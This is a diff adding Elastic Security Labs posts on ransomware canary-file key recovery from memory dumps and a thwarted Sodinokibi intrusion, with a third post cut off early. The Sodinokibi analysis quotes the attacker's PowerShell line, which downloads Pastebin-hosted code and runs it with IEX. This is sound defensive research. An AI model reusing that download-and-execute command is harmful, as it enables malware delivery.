files](https://www.elastic.co/blog/deterring-ransomware-for-state-and-local-government) with the purpose of attempting to honeypot ransomware by (over-)writing some specific files. This provides a high confidence indicator that the culprit process is attempting to encrypt all files.\n\nA canary file acts and looks exactly like any other file - it can have valid content (DOCX, PDF, etc.), hidden, or marked as a system file to avoid user tampering. However, canary files cannot be “fingerprinted” and avoided by ransomware. All of these factors lead to a robust indicator for ransomware access.\n\nEven though canary files are very successful in providing indicators for ransomware, it is hard to be certain on Windows systems that no file has been encrypted *before* the detection (and, if wanted, termination) occurs. This is not a product defect, it is due to the very structure of how MiniFilters work on Windows. Therefore, even though the attack is thwarted, some files may have been encrypted. Worse, if the process is terminated, the possibility of retrieving the original content may be completely lost.\n\nAnd this is where our ON Week research began…\n\n## Extending our canary protection to generate process snapshots\n\n### The basic underlying concept\n\nThe idea behind this first research was as follows:\n - At the kernel level, detect write access attempts to a file with a specific name (our canary)\n - From userland, generate a process dump of the culprit process attempting the write operation and signal the driver to continue execution as designed\n - Analyze process dumps\n\nWith ON Week being limited to one week, this is the initial time frame we had for developing a prototype. \n\n### Implementation\n\n#### In kernel land\n\nDeveloping a MiniFilter driver to monitor write access to files with specific names went relatively easily following the well-documented [MiniFilter API documentation](https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/_ifsk/):\n \n 1. Declare the filter table containing the callbacks we want to install, one for write access when invoking ```NtWriteFile()```, and another for when attempting to write to a mapped section\n\n\n\n\n 2. Create and register the filter, including the file name pattern to monitor and start filtering:\n \n\n_Image 2: Declaring a filename pattern to inspect for the MiniFilter driver_\nOnce our filter is registered to the Filter Manager, write accesses will go through our driver’s callbacks when specific syscalls are triggered: by ```NtWriteFile``` when a process attempts to write a buffer to a file, or by ```NtCreateSection()``` when a process to create a section with file-backed mappings with write access (```SECTION_MAP_WRITE```)\n\n\n\n\nAs we can see either action will result in the invoking process being suspended (call to our function ```SuspendProcessById```) allowing a userland process to snapshot its memory. The following video summarizes all those steps:\n\n\n\n\n### In user land\n\nGenerating memory dumps is a robust mechanism well anchored into Windows and a significant part of its Error Reporting mechanism - or [WER](https://learn.microsoft.com/en-us/windows/win32/wer/windows-error-reporting). Through simple and explicit API calls, like [```MiniDumpWriteDump```](https://learn.microsoft.com/en-us/windows/win32/api/minidumpapiset/nf-minidumpapiset-minidumpwritedump) any user or program may dump (if permission permits) the complete memory layout and content of a target process, along with more information depending on flags passed during invocation such as:\n - handle information\n - thread information\n - unloaded module details and more\n\nA complete reference list of available types can be consulted [here](https://github.com/Skulltrail192/One-Core-Api/blob/76729f2108c2afca24d89efc92b814a07b92a62e/dll/win32/dbghelp/compat.h#L914-L931).\n\nWe decided to use memory dumps, designed for debugging software, to extend our ransomware protection feature's existing canary file capabilities. When ransomware is detected, we generate a complete memory dump before the process is terminated. Using memory dumps against malware has tremendous advantages, including:\n - Revealing the process memory layout, which is particularly useful when packing has obscured the memory regions\n - Disclosing all memory contents of the process as it is running, including unwiped memory regions since Windows does not immediately erase memory for performance reasons \n - Providing stable and safe ways to experiment against malware through emulation\n\n\n\n\nVery quickly, we had a stable and reliable way to detect canary write access and generate complete memory dumps of the ransomware triggering them. Due to time constraints, we selected two popular families to test the analysis phase of our project: NOTPETYA and WANNACRY.\n\nThe prototype code can be found [here](https://github.com/calladoum-elastic/canary-driver) and is not intended for production use. Please experiment at your own risk, using non-production systems.\n\n### Real-life examples\n\n#### Recovering keys from process runtime: the case of NOTPETYA\n\nWhy NOTPETYA? It was a good first candidate because it encrypts all files with one random session key. It also uses strong cryptography:\n - RSA-1024 for the host-level asymmetric encryption key\n - A unique AES-128 CBC key used for encrypting the files\n\nUsing the driver and agent crafted above, we could easily have NOTPETYA (SHA1 [`027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745`](https://www.virustotal.com/gui/file/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745)) run in a contained environment and get a process minidump at a very predictable runtime location. \n\nOur current design causes the driver to capture the writes synchronously, so we know exactly where we are in the process runtime when analyzing dump files. However, we still needed some reverse engineering to learn exactly how the session keys were generated.\n\nReversing this NOTPETYA DLL proved to be straightforward, which helped us move quickly: \n - After some initial checks, the DLL attempts to iterate through all the possible drive letters, and for each match (i.e., the letter - such as `C:\\` exists) a `0x20` thread context will be created to proceed with the encryption\n\n\n\n\n - Each thread initializes its own cryptographic context using the Microsoft CryptoAPI; we note the use of AES-CBC 128 bits\n \n\n\n\n - Encrypts the files recursively (with a maximum recursion level of 15), dropping the ransom message and destroying the cryptographic context\n\n\n\n\n - The file encryption itself is performed using file-backed mappings to overwrite files of specifically targeted extensions:\n\n\n\n\nThis leaves us with a very basic stack-based structure for the context:\n\n```\nc\nstruct _THREAD_CONTEXT { /* sizeof=0x20, align=0x4, mappedto_50) */\n /* 00000000 */ WORD lpswzRootPathName[4];\n /* 00000008 */ HANDLE hProvider;\n /* 0000000C */ PVOID field_C;\n /* 00000010 */ LPVOID pBase64Data;\n /* 00000014 */ HCRYPTPROV hKey;\n /* 00000018 */ DWORD field_18;\n /* 0000001C */ HANDLE hFile;\n};\n```\n\nEquipped with that knowledge, we could explore further in the dump. Since we know write accesses were made using ```kernel32!CreateFileMapping```, this means ```ntdll!NtCreateSection``` is called, and we can isolate the active thread that triggered the syscall to the canary file:\n\n```\ndx @$curprocess.Threads.Where( t => t.Stack.Frames.First().ToDisplayString().Contains(\"NtCreateSection\") )\n```\n\n\n\n\nAs explained previously, we’ve isolated the context session and know it’s located in the stack. From the base pointer to the session context, we can retrieve the cryptographic context from the context structure member ```_THREAD_CONTEXT.hKey``` located at offset 0x14.\n\n```\n0:007:x86> dx @$curthread.Stack.Frames[3].Attributes.FrameOffset + 0x10\n@$curthread.Stack.Frames[3].Attributes.FrameOffset + 0x10 : 0x518d210\n0:007:x86> dps poi(0x518d210) l6\n004859a0 003a0043\n004859a4 0000005c\n004859a8 00538418\n004859ac 00000000\n004859b0 04060550 \n004859b4 0048fc48 <<< hKey\n0:007:x86> dps 0048fc48 \n0048fc48 74a850c0 rsaenh!CPGenKey\n0048fc4c 74a9ad90 rsaenh!CPDeriveKey\n0048fc50 74a886c0 rsaenh!CPDestroyKey\n0048fc54 74a9c770 rsaenh!CPSetKeyParam\n0048fc58 74a898c0 rsaenh!CPGetKeyParam\n0048fc5c 74a84c40 rsaenh!CPExportKey\n0048fc60 74a86290 rsaenh!CPImportKey\n0048fc64 74a99880 rsaenh!CPEncrypt\n0048fc68 74a8a500 rsaenh!CPDecrypt\n0048fc6c 74a9b5c0 rsaenh!CPDuplicateKey\n0048fc70 00538418 \n0048fc74 e3155764 <<< hCryptKey\n0048fc78 22222222\n[...]\n```\n\nThe crypto context structures are not made publicly accessible by Microsoft but have been [reverse-engineered](https://forums.codeguru.com/showthread.php?79163-Structure-of-HCRYPTKEY-Data&s=b0a1fb3f896437fc13727105e44628d6&p=2234957#post2234957)\n\n```\nstruct HCRYPTKEY\n{\n void* CPGenKey;\n void* CPDeriveKey;\n void* CPDestroyKey;\n void* CPSetKeyParam;\n void* CPGetKeyParam;\n void* CPExportKey;\n void* CPImportKey;\n void* CPEncrypt;\n void* CPDecrypt;\n void* CPDuplicateKey;\n HCRYPTPROV hCryptProv;\n magic_s *magic; // XOR-ed\n};\nstruct magic_s\n{\n key_data_s *key_data;\n};\n\nstruct key_data_s\n{\n void *unknown; // XOR-ed pointer\n uint32_t alg;\n uint32_t flags;\n uint32_t key_size;\n void* key_bytes;\n};\n```\n\nFrom this context, we can extract and decode the location of the AES structure, as the key is known to be [```0xE35A172C```](https://forums.codeguru.com/showthread.php?79163-Structure-of-HCRYPTKEY-Data&s=b0a1fb3f896437fc13727105e44628d6&p=2234957#post2234957) for 32-bit processes:\n\n```\n0:007:x86> ? e3155764^ 0xE35A172C\nEvaluate expression: 5193800 = 004f4048\n\n0:007:x86> dps poi(004f4048 ) l5\n0053cdd0 e3152844 // /* +0 */ unknown\n0053cdd4 0000660e // /* +4 */ alg\n0053cdd8 00000001 // /* +8 */ flags\n0053cddc 00000010 // /* +c */ key_size\n0053cde0 0053ce70 // /* +10 */ key_bytes\n```\n\nFrom the dump, we also know the type (AES-CBC), location in memory (`0x053ce70`), and size (`0x10`) of the key. The session key can be successfully retrieved! \n\n\n\n\nNot only does this allow complete decryption of all encrypted files for this process, but the astute observer would have noticed that all [those steps can be automated](https://gist.github.com/calladoum-elastic/8a142ad8b20de048a0edb2ec6fde2660), allowing us to create decryptors using just the generated memory dump!\n\n\n\n\nTo see this process fully, you can watch the [demo](https://youtu.be/UCZFAV9EveQ) and check out the [code](https://gist.github.com/calladoum-elastic/3b733b023c237a6017b399d4c4f18d27#file-notpetya_extract_key_from_dump-py) on GitHub. \n\nWe can even create scripts for decryption that would apply to all machines infected with the same variant. Even though WinDbg is the tool of choice, all those steps can be completely automated, making this approach very scalable.\n\n### Predicting encryption keys from the process runtime: the case of WANNACRY\n\nWANNACRY is another ransomware family we felt qualified for this experiment, as it is well-known and – most importantly for this research – used a more complex logic for file encryption:\n\n\n\n\n#### Deep dive into Windows (Pseudo-)random Number generation\n\nTo encrypt files, WANNACRY uses Windows' encryption library and generates one random AES key per file by means of the high-level API function [```advapi32!CryptGenRandom```](https://learn.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-cryptgenrandom). Each key is associated with the corresponding file, then RSA-encrypted and submitted to its C2. By design, the approach we used against NOTPETYA will not work here. WANNACRY offered us a different challenge, once again demonstrating that having a complete memory dump provides other invaluable resources.\n\nRandom number generation is often less random than most people think. Generating a truly random number is both challenging and expensive, and this challenge is at the heart of any cryptographic algorithm. \n\nWindows (not unlike other OS) generates [random numbers in a pseudo-random way](https://en.wikipedia.org/wiki/Pseudorandom_number_generator). This means the random number generator derives an initial state (called a seed) with a cryptographic function (for instance, XorShift or Mersenne-Twister). One of the logical consequences of using PRNG is that knowing the state of the random generator at a moment T allows us to know precisely all random values at T+1, T+2, etc. Note that this is not a weakness as randomness is a highly complex and performance-costly operation; this approach is a great trade-off. \n\nWe will be taking advantage of this property to defeat WANNACRY. Knowing that WANNACRY repeatedly will call CryptGenRandom to generate the AES encryption for each file, if we have a way to know those values strictly through emulation of the minidump file, then we will also know the possible AES keys. This looks promising but may conceal several roadblocks. \n\nTaking a step back, what is CryptGenRandom in the first place – what does it do? The [MSDN](https://learn.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-cryptgenrandom) informs us that this (deprecated) function fills up a buffer with random content using a [Cryptographic Service Provider](https://learn.microsoft.com/en-us/windows/desktop/SecGloss/c-gly)(HCRYPTPROV). Setting a breakpoint to CryptGenRandom allows us to look under the hood with WinDbg on a Windows 11 x64. We can then easily traverse the high-level APIs and observe that ```advapi32!CryptGenRandom``` is a wrapper to ```cryptsp!CryptGenRandom```, which in turn leads us to the ```CPGenRandom``` function in ```rsaenh.dll```.\n\n```\n0:000> g\nBreakpoint 9 hit\nCRYPTSP!CryptGenRandom+0x29:\n00007ffc`990c1699 488b8be0000000 mov rcx,qword ptr [rbx+0E0h] ds:000001e1`38ade010=e35a16cde1cff7d0\n0:000> dps @rbx\n000001e1`38addf30 00007ffc`987956d0 rsaenh!CPAcquireContext\n000001e1`38addf38 00007ffc`987951e0 rsaenh!CPReleaseContext\n000001e1`38addf40 00007ffc`98791140 rsaenh!CPGenKey\n000001e1`38addf48 00007ffc`987a8f80 rsaenh!CPDeriveKey\n000001e1`38addf50 00007ffc`987948a0 rsaenh!CPDestroyKey\n000001e1`38addf58 00007ffc`987aaac0 rsaenh!CPSetKeyParam\n[...]\n\n0:000> t\nCRYPTSP!CryptGenRandom+0x3c:\n00007ffc`990c16ac ff1506c50000 call qword ptr [CRYPTSP!_guard_dispatch_icall_fptr (00007ffc`990cdbb8)] ds:00007ffc`990cdbb8={CRYPTSP!guard_dispatch_icall_nop (00007ffc`990c4d30)}\n\n0:000> r rax, rcx,rdx ,r8\nrax=00007ffc987954d0 rcx=e35a16cde1cff7d0 rdx=0000000000000010 r8=00000065859bfe70\n\n0:000> .printf \"%y\\n\", @rax\nrsaenh!CPGenRandom (00007ffc`987954d0)\n```\n\nWhen ```CRYPTSP!CryptGenRandom``` is invoked, the RCX register holds the pointer to the encoded crypto provider, which is XOR encoded with the magic constant ```0xE35A172CD96214A0``` (Remember the ```0xE35A172C``` magic constant we used earlier? This is its 64-bit version counterpart). Looking at ```rsaenh!CPGenRandom``` in IDA made clear the cryptographic provider handle serves only as a check to determine the correct validity of the context passed to the function but has no real implication about the randomness generation.\n\n\n\n\nThe entire randomness generation logic is deported to the function ```cryptbase!SystemFunction036```, which simply takes two arguments: the buffer to receive the random data and its length. This was great news because random number generation had no external factor an attacker could use at runtime to make the generation more complex. Going farther into the rabbit hole, we realized that ```cryptbase!SystemFunction036``` itself is nothing more than a light wrapper for ```bcryptprimitives!ProcessPrng```, which – by the name of the function – seems to match our expectations.\n\nThe ```bcryptprimitives``` DLL is part of the [Cryptographic Next Generation API](https://learn.microsoft.com/en-us/windows/win32/seccng/cng-portal) (CNG) and is quite complex. Fully reversing would be out-of-scope for this research, so we only focused on the parts we're interested in. First, we observed that once loaded in the process, the library initializes the process seed - either from the [```rdrand```](https://www.felixcloutier.com/x86/rdrand) instruction or from a VTL1 call to the [```IumKernelState```](https://learn.microsoft.com/en-us/windows/win32/procthread/isolated-user-mode--ium--processes) trustlet in the explicitly named ```InitUmRootRngState``` function. Then, it populates a random number generator state table and updates the RNG seed version state in the ```ntdll!_KUSER_SHARED_DATA::RNGSeedVersion```.\n\n\n\n\nWhen ```ProcessPrng``` is invoked, the generation of the next pseudo-random number is determined by a CPU-specific state. To be precise, the processor number on which the current thread is running is used as an index to load and generate the next number. We’ll explain more later, but this will be challenging in the future. Using this state information, the next number is produced by invoking ```AesRNGState_generate```, storing the result inside the buffer given in an argument.\n\n\n\n\nThis is a non-negligible issue for what we’re trying to accomplish. On multiprocessor-aware Windows (which all modern PCs are), it is hard to consistently know the processor number the thread is running on, making generation prediction impossible. However, Windows provides ways to affect the scheduler, as shown below.\n\n\n\n\n#### Pseudo-Random number prediction through user-mode emulation of the memory dump\n\nKeeping in sight that to defeat WANNACRY, we need to be able to execute the function ```cryptbase!SystemFunction036``` directly from the memory dump. We can make this with an emulator (like QEMU or Bochs) by mapping the execution context (populating the memory layout, restoring the TEB/PEB etc.) gathered from the memory dump of the ransomware, which we did following these steps:\n 1. Parse the user-mode dump to [extract and map all the memory layout](https://gist.github.com/calladoum-elastic/3b733b023c237a6017b399d4c4f18d27#file-emulate_cryptrandomgen-py-L272-L287); for this step, we used the Python bindings of the [udmp-parser](https://github.com/0vercl0k/udmp-parser) library\n 2. Fully [reconstruct a working memory layout in an emulator](https://gist.github.com/calladoum-elastic/3b733b023c237a6017b399d4c4f18d27#file-emulate_cryptrandomgen-py-L291-L322), for which [bochscpu](https://github.com/yrp604/bochscpu) along with its [Python bindings](https://github.com/hugsy/bochscpu-python) were used\n 3. [Rebuild a valid thread context](https://gist.github.com/calladoum-elastic/3b733b023c237a6017b399d4c4f18d27#file-emulate_cryptrandomgen-py-L354-L370) by finding the function ```cryptbase!SystemFunction036``` and emulating the runtime\n\nHowever, we still lack the ability to predict on which CPU the thread invoking ```cryptbase!SystemFunction036``` will be running on, therefore, cannot accurately predict the following values returned by the function. On a single-core machine, this is not a problem as our PRNG state table will only hold one entry, and this approach was tested to work perfectly out-of-the-box. However, it fails on multi-core systems, as only the first call to ```cryptbase!SystemFunction036``` would return the correct random values.\n\n\n\n\nTo have accurate emulation on multi-core machines, we need to know the processor number on which the next thread calling ```cryptbase!SystemFunction036``` will be called at runtime is fairly impossible. Two possible approaches were tested:\n 1. From the dump, we have knowledge of the entire PRNG state table. Because of this, we can make the emulation script hook the function ```ntdll!RtlGetCurrentProcessorNumberEx``` and use it to determine the index in the random table, then have it generate all the values for a specific core. This approach proved successful but extremely tedious, especially at scale as automation would generate exponential possibilities to retrieve the correctly generated sequence.\n 2. Another option happens during the canary detection itself. Once the canary confirms it is ransomware, we can enforce the culprit process CPU affinity to only one CPU, whose index we can choose freely. This can be done from kernel or user mode as long as the targeted process is opened with the [```PROCESS_SET_INFORMATION```](https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-setprocessaffinitymask) access right. This processor index will determine the entry taken in the `AesStateTable` array, and doing so allows us to reliably predict all future values of the PNRG via emulation.\n\n\n\n\nTo see the WANNACRY process in full, you can watch the [demo](https://youtu.be/uXqI0ZSqZhI). We also have the [code](https://gist.github.com/calladoum-elastic/3b733b023c237a6017b399d4c4f18d27) available for review on GitHub.\n\nTesting both techniques showed that it is possible to predict the future value of the PRNG with the minidump at our disposal. This would be immensely helpful against ransomware like WANNACRY, which uses Windows PRNG to generate unique AES keys for each encrypted file.\n\n## Incorporating this research into the Elastic Endpoint\n\nON Week at Elastic is a place for experimenting without constraints and often leads to great improvements for the existing Elastic solutions. \n\nProcess snapshot generation was added to Elastic Security in version [8.11](https://www.elastic.co/blog/whats-new-elastic-security-8-11-0). With protection enabled, should ransomware be detected, the endpoint will generate a complete memory process dump before resuming execution, likely leading to the ransomware process termination. We hope this simple addition can assist DFIR teams further by providing better insight into what the ransomware was attempting. \n\nRecent news has shown that process memory dumps can leak a [great amount of valuable private information](https://www.msn.com/en-us/news/technology/microsoft-china-stole-secret-key-that-unlocked-us-govt-email-from-crash-debug-dump/ar-AA1glLPJ) if made available publicly. Therefore, it must be stressed that no memory dump is ever submitted to Elastic, even with the feature enabled. The dump file is generated (and compressed) by the endpoint locally, and the resulting file is stored within Elastic’s secure installation folder (by default, ```$ElasticInstallPath\\Endpoint\\cache\\RansomwareDumps```). This way, the dump files cannot be easily tampered with by attackers but are easily accessible to forensics and incident response teams to assist them in the recovery process.\n\nLet’s demonstrate this feature in action on a fresh Elastic 8.11 against NOTPETYA: [watch the demo](https://youtu.be/d16yKWUf3dI)\n\n## Closing remarks\n\nThis concluded our ON Week research with quite a positive outcome. Did we come up with a bulletproof solution against all ransomware? No, and such a thing likely won’t ever exist. As we’ve underlined in the introduction, ransomware exists in so many types and varieties that it probably seems impossible to have one solution for all.\n\nWhat this research found, however, was that this approach offers a great trade-off between FP risk, system requirements, and potential outcome. There is very little risk of snapshotting the process memory should it be flagged as ransomware by the canary feature. In the case of a false positive, the computer would simply end up with a dump file in a protected location (and ZIP compression would drastically reduce the footprint on disk).\n\nWhile this is not the perfect ransomware solution, offering a memory dump of the ransomware can boost forensic work and potentially allow teams to recover or even predict session encryption keys. Complete memory dumps can be an amazing ally in debugging and forensics because they provide an exhaustive view of how things happen at runtime. And thanks to emulation, we can confidently retrace some of the steps that lead to a compromise and hopefully fix it.\n"
+ },
+ "title": "Ransomware in the honeypot: how we capture keys with sticky canary files",
+ "slug": "ransomware-in-the-honeypot-how-we-capture-keys",
+ "date": "2024-02-23",
+ "description": "This article describes the process of capturing encryption keys from ransomware using Elastic Defend ransomware protection.",
+ "author": [
+ {
+ "slug": "salim-bitam"
+ },
+ {
+ "slug": "christophe-alladoum"
+ }
+ ],
+ "image": "photo-edited-07.png",
+ "category": [
+ {
+ "slug": "security-research"
+ }
+ ],
+ "tags": [
+ "ransomware",
+ "canary",
+ "honeypot"
+ ]
+ },
+ "id": "security_labs_content-ransomware_in_the_honeypot_how_we_capture_keys-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-ransomware_interrupted_sodinokibi_and_the_supply_chain-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-ransomware_interrupted_sodinokibi_and_the_supply_chain-md.json
new file mode 100644
index 00000000000..aee19001daf
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-ransomware_interrupted_sodinokibi_and_the_supply_chain-md.json
@@ -0,0 +1,24 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Ransomware, interrupted: Sodinokibi and the supply chain\"\nslug: \"ransomware-interrupted-sodinokibi-and-the-supply-chain\"\ndate: \"2022-06-02\"\ndescription: \"Learn how Elastic Endpoint Security's behavior-based protections prevented a targeted ransomware attack on multiple endpoints.\"\nauthor:\n - slug: david-french\nimage: \"ransomware-prevention-blog-thumbnail.jpg\"\ncategory:\n - slug: campaigns\n---\n\nLast month, the [Elastic Security](https://www.elastic.co/blog/introducing-elastic-endpoint-security) Protections Team prevented an attempted ransomware attack targeting an organization monitored by one of our customers, an IT Managed Service Provider (MSP). We analyzed the alerts that were generated after an adversary’s process injection attempts were prevented by [Elastic Endpoint Security](https://www.elastic.co/products/endpoint-security) on several endpoints. Adversaries often attempt to inject their malicious code into a running process before encrypting and holding the victim’s data to ransom.\n\nThe behavior we observed in this case is consistent with reports of malicious actors, who have targeted MSPs in order to deploy ransomware at an enterprise scale. By abusing the trust relationships between MSPs and their customers, attacks of this nature scale in impact — capable of crippling small businesses, interfering with transportation, or even disrupting a critical municipal public service.\n\nIt is important to note in this case that the adversary accessed the target environment via another MSP, who is not an Elastic Security customer — we do not have specific details about that environment or how it may have been compromised.\n\nIn this post, we’ll discuss the malicious behavior that we observed and prevented, why this attack is often successful in the wild, and what you can do to reduce the effectiveness of this type of attack in your enterprise.\n\n> Elastic Security Intelligence and Analytics, a team within Elastic Security Engineering, uses anonymized security telemetry from participating customers to track threats and improve products, a function that includes collecting alert metadata. By monitoring patterns of events affecting many customers, we’re able to make time-sensitive decisions that improve our ability to mitigate emerging threats or provide the community with essential information.\n\n## Preventing malicious process injection\n\nThe earliest evidence of compromise was detected when several [process injection](https://attack.mitre.org/techniques/T1055/) attempts were prevented. Process injection can be used to execute code in the address space of a running process. Adversaries often execute this technique in an attempt to avoid detection by security products, or to run their malicious code in a process running at a higher integrity level to elevate their privileges.\n\n\n\nAnalyzing the process injection alerts established that PowerShell, a powerful native scripting framework, was leveraged in an attempt to inject shellcode into itself — a behavior that is usually malicious. The powershell.exe process was created as a descendant of ScreenConnect.WindowsClient.exe — a remote desktop support application. This type of software is used to allow IT administrators to connect to remote computers and provide support to end users, but applications like this are often abused by adversaries — a tactic known as “living off the land.”\n\nThe figure below depicts the unusual process lineage associated with this case in Resolver™, our visualization that displays events associated with an attack.\n\n\n\nNotice that cmd.exe and powershell.exe are both descendants of the ScreenConnect.WindowsClient.exe process. This is suspicious considering their ability to execute malicious commands or scripts, but in isolation this does not necessarily indicate malicious activity. Baselining your environment and understanding normal process relationships in your enterprise is crucial to hunting for, detecting, or responding to malicious behavior.\n\nIn this case, reviewing the processes and their command line arguments revealed that the adversary leveraged ScreenConnect remote desktop software to connect and copy a batch file to the target endpoint. Examining one of the cmd.exe processes in Resolver™ showed that the batch file contained a Base64-encoded PowerShell script that was subsequently executed.\n\n## Detecting and preventing unwanted behaviors with EQL\n\nWhile this potential target protected by Elastic Endpoint Security avoided an expensive ransomware outbreak, many MSPs are still coming to grips with this methodology. This adversary understands that service providers often have implicit trust with their customers and that makes providers of all kinds valuable.\n\nOnce an adversary has obtained initial access to their target environment, it is typical for them to seek out and abuse implicit trust relationships as seen in this case. The victim organization trusts the connections to their environment from their MSP via the remote desktop support application, which introduces the risk of [supply chain compromise](https://attack.mitre.org/techniques/T1195/).\n\nWhen considering how to monitor and defend these trust relationships, focusing on applications that connect from the trusted party into your network is a good starting point. Blacklisting descendant processes of ScreenConnect may not be a viable solution to prevent this malicious behavior, as this may prevent legitimate support personnel from being effective. However, a security monitoring team may decide that a descendant process of ScreenConnect that is using the network is suspicious and want to detect and prevent that behavior. This is possible using [Elastic’s Event Query Language (EQL)](https://www.endgame.com/blog/technical-blog/getting-started-eql) and is a generic approach to developing environmental awareness.\n\nThe following EQL query searches for a sequence of two events that are tied together using the process’s unique process ID (PID). The first event looks for a process that is a descendant of ScreenConnect\\*.exe. The second event looks for network activity from the descendant process. This query can easily be expanded to include other remote access software or filter expected activity in your environment.\n\n```\nsequence by unique_pid\n [process where descendant of [process where process_name == \"ScreenConnect*.exe\"]]\n [network where true]\n```\n\nWith Elastic Endpoint Security, it is also possible to configure a [Reflex response action](https://www.elastic.co/blog/what-is-reflex), which is a way for customers to implement their own custom prevention rules. For example, we can kill the descendant process when it establishes a network connection, which would prevent additional malicious code from being downloaded or command and control activity.\n\n\n\nElastic Endpoint Security ships with hundreds of our own behavior-based analytics that include ways to detect and prevent abnormal process relationships involving third-party administrative tools or binaries that are native to the Windows, MacOS, or Linux operating systems.\n\n## Analysis of adversary tradecraft\n\nThe PowerShell script that was executed checked the processor architecture before utilizing the .NET WebClient class to download content from Pastebin and the Invoke-Expression (IEX) cmdlet to execute code. This is a popular technique amongst adversaries for downloading and executing code via PowerShell.\n\nPastebin is a plain text hosting and sharing service where legitimate users often share code snippets. However, malicious actors utilize Pastebin and similar websites to store malicious code or publish leaked credentials.\n\n```\nIf ($ENV:PROCESSOR_ARCHITECTURE - contains 'AMD64') {\n Start - Process - FilePath \"$Env:WINDIR\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe\" - argument \"IEX ((new-object net.webclient).downloadstring('https://pastebin[.]com/raw/[REDACTED]'));Invoke-LJJJIWVSRIMKPOD;Start-Sleep -s 1000000;\"\n} else {\n IEX ((new - object net.webclient).downloadstring('https://pastebin[.]com/raw/[REDACTED]'));\n Invoke - LJJJIWVSRIMKPOD;\n Start - Sleep - s 1000000;\n}\n```\n\n_PowerShell script that downloaded content1 from pastebin.com_\n\nThis behavior is often categorized as a fileless or in-memory attack due to zero or minimal disk activity that occurs on the endpoint. When the Elastic Endpoint Security agent detects a fileless attack, it automatically collects and extracts the staged injected code and strings. This feature ensured that we had full visibility into the behavior being prevented.\n\nSearching [VirusTotal](https://www.virustotal.com/) for some of the collected strings surfaced several specimens from the Sodinokibi ransomware family.\n\nThe following specific toolmarks and behaviors indicate that this activity is consistent with the execution of the Sodinokibi or Gandcrab ransomware specimens as reported by [BleepingComputer](https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-spreads-wide-via-hacked-msps-sites-and-spam/) and [Cynet](https://www.cynet.com/blog/ransomware-never-dies-analysis-of-new-sodinokibi-ransomware-variant/):\n\n- The malicious actor utilized ScreenConnect remote desktop support software to connect from a compromised MSP to the target enterprise.\n- ScreenConnect was used to copy a batch script to the endpoints, which contained a PowerShell script to download and inject malicious code from Pastebin.\n- The PowerShell script contained cmdlets and strings (e.g., Invoke-LJJJIWVSRIMKPOD and Start-Sleep) that have been observed in other Sodinokibi ransomware campaigns.\n- The strings that were collected from the injected threads are consistent with Sodinokibi ransomware samples that were submitted to VirusTotal within the last 24 hours.\n\nAfter the adversary’s attempt to self-inject shellcode and execute ransomware was prevented, their attack on the initial endpoint stopped. After a period of 15 minutes, the adversary returned and attempted to execute the same procedures on an additional five endpoints before giving up. All of their attempts to deploy ransomware were prevented.\n\n## Conclusion\n\nIn this post, we discussed a real-world case of a malicious actor abusing trusted relationships between an MSP and its customers and attempting to deploy ransomware. This highlights the importance of understanding the relationships that your organization has with third parties and the potential impact if those connections are abused.\n\nAnalyzing the alerts revealed that the adversary connected to the customer’s environment via remote desktop support software and executed a malicious script with the intention of downloading, injecting, and executing ransomware. All of the adversary’s attempts were prevented.\n\nThis case also demonstrates the importance of having a layered approach to security and being able to detect and prevent adversary behavior and fileless attacks. We dissected the attackers procedures and showed how EQL and Reflex can be used to create custom rules and responses.\n\nLooking only for malicious files is not enough; Elastic Endpoint Security provides several layers of behavior-based protections against ransomware, fileless attacks, phishing, exploits, and adversary behavior.\n\n[EQL support is being added to Elasticsearch](https://github.com/elastic/elasticsearch/issues/49581).\n\n_1 — The content has since been removed from Pastebin by its creator or the Pastebin staff_\n"
+ },
+ "title": "Ransomware, interrupted: Sodinokibi and the supply chain",
+ "slug": "ransomware-interrupted-sodinokibi-and-the-supply-chain",
+ "date": "2022-06-02",
+ "description": "Learn how Elastic Endpoint Security's behavior-based protections prevented a targeted ransomware attack on multiple endpoints.",
+ "author": [
+ {
+ "slug": "david-french"
+ }
+ ],
+ "image": "ransomware-prevention-blog-thumbnail.jpg",
+ "category": [
+ {
+ "slug": "campaigns"
+ }
+ ]
+ },
+ "id": "security_labs_content-ransomware_interrupted_sodinokibi_and_the_supply_chain-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-ref2924_howto_maintain_persistence_as_an_advanced_threat-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-ref2924_howto_maintain_persistence_as_an_advanced_threat-md.json
new file mode 100644
index 00000000000..0490a9af493
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-ref2924_howto_maintain_persistence_as_an_advanced_threat-md.json
@@ -0,0 +1,30 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"REF2924: how to maintain persistence as an (advanced?) threat\"\nslug: \"ref2924-howto-maintain-persistence-as-an-advanced-threat\"\ndate: \"2023-03-27\"\ndescription: \"Elastic Security Labs describes new persistence techniques used by the group behind SIESTAGRAPH, NAPLISTENER, and SOMNIRECORD.\"\nauthor:\n - slug: remco-sprooten\nimage: \"blog-thumb-pink-grapefruit-outlier.jpg\"\ncategory:\n - slug: attack-pattern\ntags:\n - ref2924\n - siestagraph\n - naplistener\n - somnirecord\n---\n\n## Preamble\n\nIn recent months, there has been a noticeable shift in the nature of the incidents being tracked under REF2924. Initially, the attacker employed custom, purpose-built malware. As the attack evolved, we observed the same group resorting to the use of open source tools or publicly available source code as a basis for developing new capabilities.\n\n### Key takeaways\n\n- The attacker has shifted from using custom malware to open source tools or publicly available source code to develop new capabilities.\n\n - The attacker has also deployed open source tools like TFirewall and AdFind in the victim's environment.\n - In order to maintain persistence the attacker has deployed multiple different tools and techniques.\n\n### .NET Webshell\n\nOn February 16th, 2023 